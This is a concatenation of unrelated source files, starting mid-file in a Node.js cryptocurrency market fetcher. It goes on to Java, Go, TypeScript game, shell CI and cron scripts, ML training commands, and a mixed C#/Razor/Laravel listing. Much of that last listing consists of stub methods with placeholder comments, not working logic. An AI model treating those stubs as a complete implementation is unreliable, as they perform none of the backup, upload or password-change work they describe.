    log('Pulling all coins...');
    request({
        url: 'https://api.coinmarketcap.com/v1/ticker/?limit=2000'
    }, (err, resp, body) => {
        if (err) {
            log(`Unable to pull coins from CoinMarketCap, retrying...`, 'error');
            log(err, 'error');
            return setTimeout(() => data.getAllCoins(), 1000);
        }
        else if (resp.statusCode != 200) {
            log(`Unable to pull coins from CoinMarketCap, retrying...`, 'error');
            log(`Got response code ${resp.statusCode}`, 'error');
            return setTimeout(() => data.getAllCoins(), 1000);
        }
        else {
            try {
                body = JSON.parse(body);
                let allCoins = [];
                for (let i = 0; i < body.length; i++) {
                    allCoins.push({
                        symbol: body[i].symbol,
                        id: body[i].id,
                        name: `${body[i].symbol} (${body[i].name})`
                    })
                }
                mainWin.webContents.send('updateCoins', allCoins);
                log('Finished pulling all coins', 'info');
            }
            catch(err) {
                log(`Unable to parse data from CoinMarketCap, retrying...`, 'error');
                log(err, 'error');
                return setTimeout(() => data.getAllCoins(), 1000);
            }
        }
    })
}
// Cache all Binance pair symbols into data.binancePairs.
// Retries forever with a 1s delay on any failure.
data.getBinancePairs = function() {
    log('Pulling all Binance pairs...');
    request({
        url: 'https://api.binance.com/api/v1/ticker/allBookTickers'
    }, (err, resp, body) => {
        if (err) {
            log(`Unable to pull pairs from Binance, retrying...`, 'error');
            log(err, 'error');
            return setTimeout(() => data.getBinancePairs(), 1000);
        }
        else if (resp.statusCode != 200) {
            log(`Unable to pull pairs from Binance, retrying...`, 'error');
            log(`Got response code ${resp.statusCode}`, 'error');
            return setTimeout(() => data.getBinancePairs(), 1000);
        }
        else {
            try {
                body = JSON.parse(body);
                let allPairs = [];
                for (let i = 0; i < body.length; i++) {
                    allPairs.push(body[i].symbol);
                }
                data.binancePairs = allPairs;
            }
            catch(err) {
                log(`Unable to parse data from Binance, retrying...`, 'error');
                log(err, 'error');
                return setTimeout(() => data.getBinancePairs(), 1000);
            }
        }
    })
}
// Cache all Bittrex market names into data.bittrexPairs.
// Retries forever with a 1s delay on any failure.
data.getBittrexPairs = function() {
    log('Pulling all Bittrex pairs...');
    request({
        url: 'https://bittrex.com/api/v1.1/public/getmarkets'
    }, (err, resp, body) => {
        if (err) {
            log(`Unable to pull pairs from Bittrex, retrying...`, 'error');
            log(err, 'error');
            return setTimeout(() => data.getBittrexPairs(), 1000);
        }
        else if (resp.statusCode != 200) {
            log(`Unable to pull pairs from Bittrex, retrying...`, 'error');
            log(`Got response code ${resp.statusCode}`, 'error');
            return setTimeout(() => data.getBittrexPairs(), 1000);
        }
        else {
            try {
                body = JSON.parse(body).result;
                let allPairs = [];
                for (let i = 0; i < body.length; i++) {
                    allPairs.push(body[i].MarketName);
                }
                data.bittrexPairs = allPairs;
            }
            catch(err) {
                log(`Unable to parse data from Bittrex, retrying...`, 'error');
                log(err, 'error');
                return setTimeout(() => data.getBittrexPairs(), 1000);
            }
        }
    })
}
// Cache all Cryptopia market labels into data.cryptopiaPairs.
// Retries forever with a 1s delay on any failure.
data.getCryptopiaPairs = function() {
    log('Pulling all Cryptopia pairs...');
    request({
        url: 'https://www.cryptopia.co.nz/api/GetMarkets'
    }, (err, resp, body) => {
        if (err) {
            log(`Unable to pull pairs from Cryptopia, retrying...`, 'error');
            log(err, 'error');
            return setTimeout(() => data.getCryptopiaPairs(), 1000);
        }
        else if (resp.statusCode != 200) {
            log(`Unable to pull pairs from Cryptopia, retrying...`, 'error');
            log(`Got response code ${resp.statusCode}`, 'error');
            return setTimeout(() => data.getCryptopiaPairs(), 1000);
        }
        else {
            try {
                body = JSON.parse(body).Data;
                let allPairs = [];
                for (let i = 0; i < body.length; i++) {
                    allPairs.push(body[i].Label);
                }
                data.cryptopiaPairs = allPairs;
            }
            catch(err) {
                log(`Unable to parse data from Cryptopia, retrying...`, 'error');
                log(err, 'error');
                return setTimeout(() => data.getCryptopiaPairs(), 1000);
            }
        }
    })
}
module.exports = data;
package com.darian.springbootjmx.dynamicBean;
import lombok.Data;
/**
 * Default {@code com.darian.springbootjmx.dynamicBean.Data} implementation.
 * Lombok's {@code @Data} generates the getters/setters, {@code equals},
 * {@code hashCode} and {@code toString} for the three fields below.
 */
@Data
public class DefaultData implements com.darian.springbootjmx.dynamicBean.Data {
    private Long id;
    private String name;
    private Integer age;
}
|
# Run g.groovy with Groovy pinned to the system OpenJDK 8 installation.
JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64 groovy g.groovy
|
#!/bin/bash -e
# NOTE(review): shebang was '/bin/sh -e', but this script uses [[ ]]
# bashisms that fail under dash — it must run under bash.
#
# Bootstrap MRTG: generate per-host configs via SNMP, render the index
# page, then run nginx and crond in the foreground until terminated.

MRTGDIR=/etc/mrtg
WEBDIR=/usr/share/nginx/html
MRTGCFG=${MRTGDIR}/mrtg.cfg

# mkdir -p is idempotent — avoids the former '[[ ! -d ]] && mkdir' pattern,
# which returns non-zero (and aborts under set -e) when the dir exists.
mkdir -p "${MRTGDIR}" "${WEBDIR}"

# Generate an MRTG config for one host unless one already exists.
# $1 = SNMP community, $2 = host.
make_cfg() {
    local community=$1 host=$2 name
    # sysName (.1.3.6.1.2.1.1.5) names the per-host config file
    name=$(snmpwalk -Oqv -v2c -c "${community}" "${host}" .1.3.6.1.2.1.1.5)
    if [[ ! -f "${MRTGDIR}/conf.d/${name}.cfg" ]]; then
        /usr/bin/cfgmaker --ifref=name --output="${MRTGDIR}/conf.d/${name}.cfg" "${community}@${host}"
    fi
}

if [ -n "${HOSTS}" ]; then
    # HOSTS is a list of community:host pairs separated by ',' or ';'.
    # (was: tr '[,;]' ' ', which also translated literal brackets by accident)
    hosts=$(echo "${HOSTS}" | tr ',;' ' ')
    for asset in ${hosts}; do
        make_cfg "$(echo "$asset" | cut -d: -f1)" "$(echo "$asset" | cut -d: -f2)"
    done
else
    make_cfg "${1:-public}" "${2:-localhost}"
fi

# MRTG needs a few runs before its rate counters settle; run it three times.
env LANG=C /usr/bin/mrtg ${MRTGCFG}
env LANG=C /usr/bin/mrtg ${MRTGCFG}
env LANG=C /usr/bin/mrtg ${MRTGCFG}
/usr/bin/indexmaker --columns=1 ${MRTGCFG} > ${WEBDIR}/index.html
chown -R nginx:nginx ${WEBDIR}

# Run nginx and crond in the background and forward termination signals.
/usr/sbin/nginx &
NGINXID=$!
/usr/sbin/crond -f -L /proc/self/fd/1 -l debug &
CRONDID=$!
trap "kill ${NGINXID} ${CRONDID}" SIGINT SIGHUP SIGTERM SIGQUIT EXIT
wait
|
import Phaser from 'phaser-ce';
import Human from 'src/app/chars/base/human';
import { MovementMouse, MovementKeys } from 'src/app/sprites/human';
import UIIngame from 'src/app/sprites/ui/ingame';
import { get as getItem, getAll as getAllItems, Item } from 'src/app/chars/items';
// Currently equipped gear, one slot per item type (null = slot empty).
interface Equips {
  armor: Item;
  weapon: Item;
  accessory: Item;
};

// Constructor options for Hero. x/y are tile coordinates (multiplied by
// map.tilesize in the constructor).
interface Config {
  game: Phaser.Game;
  group: Phaser.Group;
  map: any;
  x?: number;
  y?: number;
  movement: MovementMouse | MovementKeys;
  controls: { [key:string]: Phaser.Key };
};

// An owned item; `equipped` is null for consumables, boolean for gear
// (see acquireItem below).
interface Inventory extends Item {
  equipped: boolean;
};
class Hero extends Human {
  private debug: boolean = false;   // toggled with the '.' key (see constructor)
  private ingame: UIIngame;         // in-game UI overlay
  controls: { [key:string]: Phaser.Key };
  gold: number = 100;               // starting gold
  inventory: Inventory[] = [];
  // Stat slots: `base` permanent, `extra` equipment bonuses, `battle` the
  // current in-battle value — NOTE(review): inferred from applyItemEffect
  // (consumables target 'battle', gear targets 'extra'); confirm.
  stats = {
    hp: {
      base: 100,
      extra: 0,
      battle: 100,
    },
    mp: {
      base: 100,
      extra: 0,
      battle: 100,
    },
    atk: {
      base: 10,
      extra: 0,
      battle: 10,
    },
    def: {
      base: 10,
      extra: 0,
      battle: 10,
    },
  };
  // One equipped item per slot; null means the slot is empty.
  equipment: Equips = {
    armor: null,
    weapon: null,
    accessory: null,
  };
  constructor({ x, y, game, group, map, movement, controls }: Config) {
    // Tile coordinates are converted to pixels for the base Human sprite.
    super({
      game,
      x: x * map.tilesize,
      y: y * map.tilesize,
      z: 0,
      sprite: 'people',
      delimiter: 0,
      group,
      map,
      movement,
    });

    this.name = 'Hero';
    this.controls = controls;

    this.ingame = new UIIngame({
      id: 'ingame',
      game: this.game,
      subject: this,
    });

    // register mouse down input upon `create` bc we only need to do it once
    if (this.movement.type === 'mouse') {
      game.input.onDown.add(() => {
        // for hero movement: convert the click position to tile coordinates
        const movement = this.movement as MovementMouse;
        const cursor = {
          x: Math.floor(movement.input.x / map.tilesize),
          y: Math.floor(movement.input.y / map.tilesize),
        };
        // ignore out of bounds clicks
        if (cursor.x >= 0 && cursor.y >= 0 && cursor.x < map.grid.length && cursor.y < map.grid.length) {
          this.generatePaths({
            x: cursor.x,
            y: cursor.y,
          });
        }
      });
    }

    // register keyboard controls: p/l confirm & cancel, w/s navigate menus
    this.controls.p.onDown.add(() => {
      this.dispatch('action');
    });
    this.controls.l.onDown.add(() => {
      this.dispatch('cancel');
    });
    this.controls.w.onDown.add(() => {
      this.dispatch('up');
    });
    this.controls.s.onDown.add(() => {
      this.dispatch('down');
    });
    // 'o' toggles the in-game UI overlay
    this.controls.o.onDown.add(() => {
      if (!this.ingame.sprite.visible && this.inMap) {
        this.ingame.show();
      } else {
        // TODO: toggling everything to hide is still not working
        this.ingame.hide();
      }
    });

    // DEBUGGING: ',' grants gold while debug mode is on; '.' toggles debug
    this.controls[','].onDown.add(() => {
      if (this.debug) {
        this.gold += 1000;
      }
    });
    this.controls['.'].onDown.add(() => {
      this.debug = !this.debug;
    });
  }
setEquipped(id: string, equipped: boolean) {
const item = this.inventory.filter(i => id === i.id)[0];
item.equipped = equipped;
}
purchaseItem(id: string) {
const item = getItem(id);
this.gold -= item.price;
this.acquireItem(item.id);
}
acquireItem(id: string) {
const item = getItem(id);
this.inventory.push({
...item,
equipped : item.consumable ? null : false,
});
}
useItem(item: Inventory) {
if (!item.consumable) return;
this.applyItemEffect(item.id);
}
discardItem(item: Inventory) {
if (item.equipped) return;
this.inventory = this.inventory.filter(i => item.id !== i.id);
}
equipItem(id: string) {
const item = getItem(id);
if (item.consumable) return; // shouldn't be able to equip a consumable
// unequip the existing one first
if (this.equipment[item.type]) {
this.unequipItem(this.equipment[item.type].id);
}
this.equipment[item.type] = item;
this.applyItemEffect(item.id);
this.setEquipped(id, true);
}
unequipItem(id: string) {
const item = getItem(id);
if (item.consumable) return; // shouldn't be able to equip a consumable
this.equipment[item.type] = null;
this.applyItemEffect(item.id, true);
this.setEquipped(id, false);
}
applyItemEffect(id: string, negate = false) {
const item = getItem(id);
item.effects.forEach((effect) => {
const target = item.consumable ? 'battle' : 'extra';
// consumables can't go higher than the base + extra
// while non-consumable stacks as permanent extra
const maxValue = this.stats[effect.property].base + this.stats[effect.property].extra
const newValue = this.stats[effect.property][target] + (effect.value * (negate ? -1 : 1));
this.stats[effect.property][target] = item.consumable ? Math.min(maxValue, newValue) : newValue;
});
}
}
export default Hero;
|
package sshutil
// HostGroup defines expected attributes for a host group that a host might belong to.
type HostGroup struct {
	ID   string // unique group identifier
	Name string // human-readable group name
}
// Host defines expected attributes for an ssh host.
// NOTE(review): unlike HostGroup, these fields carry json tags, so only Host
// is expected to be (de)serialized with these key names — confirm intent.
type Host struct {
	HostID     string      `json:"hid"`
	HostGroups []HostGroup `json:"host_groups"`
	Hostname   string      `json:"hostname"`
}
|
#!/usr/bin/env bash
set -e

# Sanity checks for required environment variables.
# BUILD_TYPE is mandatory; everything else falls back to a sane default.
if [ -z "$BUILD_TYPE" ]; then
  echo "Error: Environment variable BUILD_TYPE is unset."
  exit 1
fi

if [ -z "$BUILD_DARTPY" ]; then
  echo "Info: Environment variable BUILD_DARTPY is unset. Using OFF by default."
  BUILD_DARTPY=OFF
fi

if [ -z "$BUILD_DOCS" ]; then
  echo "Info: Environment variable BUILD_DOCS is unset. Using OFF by default."
  BUILD_DOCS=OFF
fi

if [ -z "$COMPILER" ]; then
  echo "Info: Environment variable COMPILER is unset. Using gcc by default."
  COMPILER=gcc
fi

if [ -z "$CODECOV" ]; then
  echo "Info: Environment variable CODECOV is unset. Using OFF by default."
  CODECOV=OFF
fi

if [ -z "$BUILD_DIR" ]; then
  # Fixed: message used to say "Error" although the script continues with a default.
  echo "Warning: Environment variable BUILD_DIR is unset. Using $PWD by default."
  BUILD_DIR=$PWD
fi
# Detect OS name/version, trying the most modern mechanism first.
if [ -f /etc/os-release ]; then
  # freedesktop.org and systemd
  . /etc/os-release
  OS=$NAME
  VER=$VERSION_ID
elif type lsb_release >/dev/null 2>&1; then
  # linuxbase.org
  OS=$(lsb_release -si)
  VER=$(lsb_release -sr)
elif [ -f /etc/lsb-release ]; then
  # For some versions of Debian/Ubuntu without lsb_release command
  . /etc/lsb-release
  OS=$DISTRIB_ID
  VER=$DISTRIB_RELEASE
elif [ -f /etc/debian_version ]; then
  # Older Debian/Ubuntu/etc.
  OS=Debian
  VER=$(cat /etc/debian_version)
elif [ -f /etc/SuSe-release ]; then
  # Older SuSE/etc. (legacy spelling of the release file)
  echo "Not supported"
  exit 1
elif [ -f /etc/redhat-release ]; then
  # Older Red Hat, CentOS, etc.
  echo "Not supported"
  exit 1
else
  # Fall back to uname, e.g. "Linux <version>", also works for BSD, etc.
  OS=$(uname -s)
  VER=$(uname -r)
fi
# Set number of threads for parallel build
# Ref: https://unix.stackexchange.com/a/129401
case "$OSTYPE" in
  linux-gnu)
    num_available_threads=$(nproc)
    ;;
  darwin*)
    # Fixed: on macOS $OSTYPE includes the Darwin version (e.g. "darwin19"),
    # so an exact match against "darwin" never succeeded — match by prefix.
    num_available_threads=$(sysctl -n hw.logicalcpu)
    ;;
  *)
    num_available_threads=1
    echo "$OSTYPE is not supported to detect the number of logical CPU cores."
    ;;
esac
num_threads=$num_available_threads

# Allow -j N to override the detected thread count.
while getopts ":j:" opt; do
  case $opt in
    j)
      num_threads="$OPTARG"
      ;;
    \?)
      echo "Invalid option -$OPTARG" >&2
      ;;
  esac
done
# Set compilers
if [ "$COMPILER" = "gcc" ]; then
  export CC=gcc
  export CXX=g++
elif [ "$COMPILER" = "clang" ]; then
  export CC=clang
  export CXX=clang++
else
  echo "Info: Compiler isn't specified. Using the system default."
fi

# Build API documentation and exit
# Fixed: quote $BUILD_DOCS so an empty/whitespace value can't break the test.
if [ "$BUILD_DOCS" = "ON" ]; then
  . "${BUILD_DIR}/.ci/travis/build_docs.sh"
  exit 0
fi

# Print a short summary of the build environment.
echo "====================================="
echo ""
echo " [ SYSTEM INFO ]"
echo ""
echo " OS      : $OS $VER ($(uname -m))"
echo " Cores   : $num_threads / $num_available_threads"
echo " Compiler: $COMPILER $($CXX --version | perl -pe '($_)=/([0-9]+([.][0-9]+)+)/')"
echo " CMake   : $(cmake --version | perl -pe '($_)=/([0-9]+([.][0-9]+)+)/')"
echo ""
echo "====================================="
# Run CMake
mkdir build && cd build

# Install into /usr on Linux so downstream example builds find the package.
if [ "$OSTYPE" = "linux-gnu" ]; then
  install_prefix_option="-DCMAKE_INSTALL_PREFIX=/usr/"
fi

cmake .. \
  -DCMAKE_BUILD_TYPE=$BUILD_TYPE \
  -DDART_BUILD_DARTPY=$BUILD_DARTPY \
  -DDART_VERBOSE=ON \
  -DDART_TREAT_WARNINGS_AS_ERRORS=ON \
  -DDART_BUILD_EXTRAS=ON \
  -DDART_CODECOV=$CODECOV \
  ${install_prefix_option}

# Check format (only where clang-format is pinned, i.e. Ubuntu bionic).
# Fixed: quote the command substitution so [ ] doesn't fail if lsb_release
# prints nothing.
if [ "$OSTYPE" = "linux-gnu" ] && [ "$(lsb_release -sc)" = "bionic" ]; then
  make check-format
fi

# DART: build, test, and install
make -j$num_threads all tutorials examples tests
ctest --output-on-failure -j$num_threads
make -j$num_threads install

# dartpy: build, test, and install
if [ "$BUILD_DARTPY" = "ON" ]; then
  make -j$num_threads dartpy
  make pytest
  make -j$num_threads install-dartpy
fi

# Codecov
if [ "$CODECOV" = "ON" ]; then
  make -j$num_threads codecov
fi

# DART: build a C++ example using installed DART
# Fixed: quote "$BUILD_DIR" in case the path contains spaces.
cd "$BUILD_DIR/examples/hello_world"
mkdir build && cd build
cmake ..
make -j$num_threads

# dartpy: run a Python example using installed dartpy
if [ "$BUILD_DARTPY" = "ON" ]; then
  cd "$BUILD_DIR/python/examples/hello_world"
  python3 main.py
fi
|
// Controller for handling user authentication with Reddit
/// <summary>
/// Controller for handling user authentication with Reddit via OAuth redirect.
/// </summary>
public class RedditAuthController : Controller
{
    private readonly IRedditAuthService _redditAuthService;

    public RedditAuthController(IRedditAuthService redditAuthService)
    {
        _redditAuthService = redditAuthService;
    }

    /// <summary>Redirects the user to Reddit's authorization page.</summary>
    public IActionResult Authenticate()
    {
        // Redirect users to Reddit for authentication
        return Redirect(_redditAuthService.GetRedditAuthUrl());
    }

    /// <summary>
    /// Callback Reddit redirects to after the user grants access.
    /// NOTE(review): the auth `state` parameter is not validated here — confirm
    /// CSRF protection is handled inside HandleAuthCallback.
    /// </summary>
    public IActionResult AuthCallback(string code)
    {
        // Handle the callback from Reddit after user authentication
        _redditAuthService.HandleAuthCallback(code);
        return RedirectToAction("Index", "Home");
    }
}
// Service for interacting with the Reddit API to retrieve saved posts
/// <summary>Service for interacting with the Reddit API to retrieve saved posts.</summary>
public interface IRedditService
{
    /// <summary>Fetches the authenticated user's saved posts using the given OAuth access token.</summary>
    Task<List<RedditPost>> GetSavedPosts(string accessToken);
}
/// <summary>
/// Default implementation of <see cref="IRedditService"/>.
/// </summary>
public class RedditService : IRedditService
{
    /// <summary>Retrieves the user's saved posts from the Reddit API.</summary>
    public Task<List<RedditPost>> GetSavedPosts(string accessToken)
    {
        // TODO: call the Reddit API (user saved-posts endpoint) with the bearer token.
        // The original stub was an async method with no return statement and did
        // not compile; fail loudly until the real call is implemented.
        throw new NotImplementedException("Reddit saved-posts retrieval is not implemented yet.");
    }
}
// View for displaying the saved posts and initiating the backup process
@page
@model RedditSavedBackup.Pages.SavedPostsModel
@* Lists the titles of the user's saved Reddit posts and offers a backup button. *@
<h2>Saved Reddit Posts</h2>
<ul>
@foreach (var post in Model.SavedPosts)
{
    <li>@post.Title</li>
}
</ul>
@* NOTE(review): this is a Razor Page, where posts are usually routed with
   asp-page-handler rather than asp-action — confirm a BackupPosts action exists. *@
<form asp-action="BackupPosts">
    <button type="submit">Backup Posts</button>
</form>
// Logic for backing up the saved posts to a chosen storage location
/// <summary>
/// Logic for backing up saved posts to a chosen storage location.
/// </summary>
public class BackupService
{
    /// <summary>Writes the given posts to the specified storage location.</summary>
    public void BackupPosts(List<RedditPost> posts, string storageLocation)
    {
        // Implement logic to backup the saved posts to the specified storage location
    }
}
// Define routes in web.php
// Profile page + picture upload for the logged-in user; change-password takes
// an explicit {id} — the controller must verify it matches the current user.
Route::get('/user/profile', 'UserProfileController@showProfile')->name('user.profile');
Route::post('/user/profile/update-picture', 'UserProfileController@updateProfilePicture')->name('user.profile.update-picture');
Route::get('/user/change-password/{id}', 'UserProfileController@showChangePasswordForm')->name('user.change-password');
Route::post('/user/change-password/{id}', 'UserProfileController@changePassword')->name('user.change-password.post');
// UserProfileController.php
class UserProfileController extends Controller {
    /**
     * Show the authenticated user's profile page.
     */
    public function showProfile() {
        // Retrieve user data and pass it to the profile view
        $userData = User::find(Auth::id());
        return view('user.profile', compact('userData'));
    }

    /**
     * Validate and store a new profile picture for the current user.
     */
    public function updateProfilePicture(Request $request) {
        // Handle profile picture update logic
        // Validate and store the new profile picture
        // Redirect back to the profile page with a success message
    }

    /**
     * Show the change-password form for the given user id.
     */
    public function showChangePasswordForm($id) {
        // SECURITY: {id} comes from the URL (untrusted). Without this check any
        // authenticated user could target another account (IDOR).
        abort_unless((int) $id === (int) Auth::id(), 403);
        // Retrieve user data and pass it to the change password view
        $userData = User::find($id);
        return view('user.change-password', compact('userData'));
    }

    /**
     * Validate and apply a password change for the given user id.
     */
    public function changePassword(Request $request, $id) {
        // SECURITY: same ownership check as showChangePasswordForm.
        abort_unless((int) $id === (int) Auth::id(), 403);
        // Handle password change logic
        // Validate and update the user's password
        // Redirect back to the profile page with a success message
    }
}
// user.profile.blade.php
<!-- Display user profile picture and real name -->
{{-- NOTE(review): the avatar path is hard-coded to avatar.jpg; presumably it
     should come from $userData — confirm. --}}
<img alt="User profile picture" src='{{url("public/uploads/userPic/avatar.jpg")}}' class="profile-user-img img-responsive img-circle asa">
<h3 class="profile-username text-center">{{$userData->real_name}}</h3>
<a class="btn btn-primary btn-block" href='{{route("user.change-password", $userData->id)}}'><b>{{ trans('message.form.change_password') }}</b></a>
// user.change-password.blade.php
<!-- Form to change the user's password -->
<form method="post" action='{{route("user.change-password.post", $userData->id)}}'>
@csrf
<!-- Password change form fields -->
</form>
# Experiment launcher: runs a series of train.py jobs for ball-screen and
# ball-handler detection, comparing astar-near program synthesis vs RNN
# baselines on several feature sets.

#### 51
# astar-near on the 51-dim full feature set, depth-8 programs.
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen_og_22_d8 \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures_2.npy \
--valid_data data/helpers/allskip5/test_fullfeatures_2.npy \
--test_data data/helpers/allskip5/test_fullfeatures_2.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 51 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"

# RNN baseline on the same 51-dim features (more epochs/units than the synthesis run).
python3.8 train.py \
--algorithm rnn \
--exp_name ballscreen_og_ \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures_2.npy \
--valid_data data/helpers/allskip5/test_fullfeatures_2.npy \
--test_data data/helpers/allskip5/test_fullfeatures_2.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 51 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 50 \
--symbolic_epochs 15 \
--max_num_units 128 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"

####
# RNN baseline on the 47-dim full feature set.
python3.8 train.py \
--algorithm rnn \
--exp_name ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 10 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--class_weights "0.1,0.9"

# Larger RNN (64 units, 50 epochs) on the 47-dim features.
python3.8 train.py \
--algorithm rnn \
--exp_name 64_ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 50 \
--symbolic_epochs 15 \
--max_num_units 64 \
--min_num_units 4 \
--class_weights "0.1,0.9"

# astar-near, shallower programs (depth 5), zero structural penalty.
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen_nopen_5 \
--trial 1 \
--train_data data/helpers/allskip5/train_fullfeatures.npy \
--valid_data data/helpers/allskip5/test_fullfeatures.npy \
--test_data data/helpers/allskip5/test_fullfeatures.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 47 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 5 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--penalty 0 \
--class_weights "0.1,0.9"

#ballscreen w/ og features only
# astar-near on the raw 22-dim trajectories (original features, no derived ones).
python3.8 train.py \
--algorithm astar-near \
--exp_name ballscreen \
--trial 1 \
--train_data data/helpers/allskip5/train_raw_trajs.npy \
--valid_data data/helpers/allskip5/test_raw_trajs.npy \
--test_data data/helpers/allskip5/test_raw_trajs.npy \
--train_labels data/helpers/allskip5/train_ballscreens.npy \
--valid_labels data/helpers/allskip5/test_ballscreens.npy \
--test_labels data/helpers/allskip5/test_ballscreens.npy \
--input_type "list" \
--output_type "list" \
--input_size 22 \
--output_size 2 \
--num_labels 1 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--max_num_units 16 \
--min_num_units 4 \
--class_weights "0.1,0.9"

# ballhandler
# 6-way ball-handler classification on the raw trajectories.
python3.8 train.py \
--algorithm astar-near \
--exp_name ballhandler \
--trial 1 \
--train_data data/helpers/allskip5/train_raw_trajs.npy \
--valid_data data/helpers/allskip5/test_raw_trajs.npy \
--test_data data/helpers/allskip5/test_raw_trajs.npy \
--train_labels data/helpers/allskip5/train_ballhandlers.npy \
--valid_labels data/helpers/allskip5/test_ballhandlers.npy \
--test_labels data/helpers/allskip5/test_ballhandlers.npy \
--input_type "list" \
--output_type "list" \
--input_size 22 \
--output_size 6 \
--num_labels 6 \
--lossfxn "crossentropy" \
--max_depth 8 \
--frontier_capacity 8 \
--learning_rate 0.001 \
--neural_epochs 6 \
--symbolic_epochs 15 \
--penalty 0.01 \
--max_num_units 16 \
--min_num_units 4
|
def is_element_of(string, s):
    """Return True if ``string`` is contained in ``s``, else False.

    ``s`` may be any container supporting ``in`` (list, set, str, ...).
    The original ``if cond: return True else: return False`` collapses to
    returning the membership test directly.
    """
    return string in s
# Demo: membership check against a list; prints True.
result = is_element_of("orange", ["apple", "banana", "orange"])
print(result)
#!/bin/sh
# Nightly cron job: once the hydra timing run has finished (marker file for
# today's date exists), regenerate the STAPL performance report pages and
# publish them to the group web area.
export PATH=/bin:/usr/bin:/usr/local/bin
export d=`date +%m-%d-%Y`
if [ -e /scratch/roma/stapl_nightly_timing/hydra_dir/$d.0025.done ]
#if [ -e /scratch/roma/stapl_nightly_timing/hydra_dir/03-07-2010.0025.done ]
then
#the sleep is needed so the new times can be inserted into the db.
sleep 300
# Summary timing tables per container.
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_array > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_parray.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_vector > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_pvector.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/timings.php machine hydra set nightly type palgorithm container p_matrix > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_pmatrix.php
# Per-algorithm-class graph pages (p_array, then p_vector; p_matrix disabled).
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_nonmutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_mutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_array num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_array_numeric.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_nonmutating.php
/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_mutating.php
